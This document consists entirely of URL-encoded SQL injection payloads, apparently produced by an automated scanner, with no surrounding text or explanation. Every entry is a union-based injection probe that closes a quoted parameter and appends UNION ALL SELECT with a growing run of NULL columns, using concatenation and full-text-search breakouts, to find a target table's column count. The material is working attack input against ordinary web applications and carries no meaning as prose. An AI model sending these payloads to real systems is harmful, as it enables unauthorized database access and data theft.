1%27%7C%7C%28SELECT%20%27NcZr%27%20FROM%20DUAL%20WHERE%201956%3D1956%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27ibkC%27%20FROM%20DUAL%20WHERE%206364%3D6364%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27fcMM%27%20FROM%20DUAL%20WHERE%205722%3D5722%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27VbXu%27%20FROM%20DUAL%20WHERE%209537%3D9537%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27VxwV%27%20FROM%20DUAL%20WHERE%201891%3D1891%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27sgRY%27%20FROM%20DUAL%20WHERE%204800%3D4800%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27unHz%27%20FROM%20DUAL%20WHERE%208190%3D8190%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27PKQQ%27%20FROM%20DUAL%20WHERE%202859%3D2859%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27PwXS%27%20WHERE%205960%3D5960%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27SBNy%27%20WHERE%207805%3D7805%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27MLeg%27%20WHERE%208299%3D8299%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27XXdC%27%20WHERE%201450%3D1450%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27iQFW%27%20WHERE%205569%3D5569%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27TwRm%27%20WHERE%206721%3D6721%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27Emym%27%20WHERE%202121%3D2121%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27QEEI%27%20WHERE%201709%3D1709%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27UZAR%27%20WHERE%203204%3D3204%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%7C%7C%28SELECT%20%27mGPU%27%20WHERE%203005%3D3005%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20PYxU%20WHERE%202757%3D2757%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20JHZA%20WHERE%204239%3D4239%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20xXWv%20WHERE%209695%3D9695%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20skYl%20WHERE%203243%3D3243%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20AJCz%20WHERE%208438%3D8438%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20YtvR%20WHERE%206369%3D6369%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20iUFW%20WHERE%208389%3D8389%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20KQft%20WHERE%208927%3D8927%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20RdYh%20WHERE%203068%3D3068%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20kCTb%20WHERE%203154%3D3154%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27WZch%27%20WHERE%206352%3D6352%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27XNVh%27%20WHERE%204055%3D4055%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27BxUl%27%20WHERE%209037%3D9037%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27jLdv%27%20WHERE%209879%3D9879%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27EASn%27%20WHERE%201001%3D1001%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27OByB%27%20WHERE%204033%3D4033%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27FytP%27%20WHERE%208406%3D8406%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27Ybud%27%20WHERE%204670%3D4670%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27eezD%27%20WHERE%204441%3D4441%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%2B%28SELECT%20%27OyXg%27%20WHERE%202057%3D2057%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 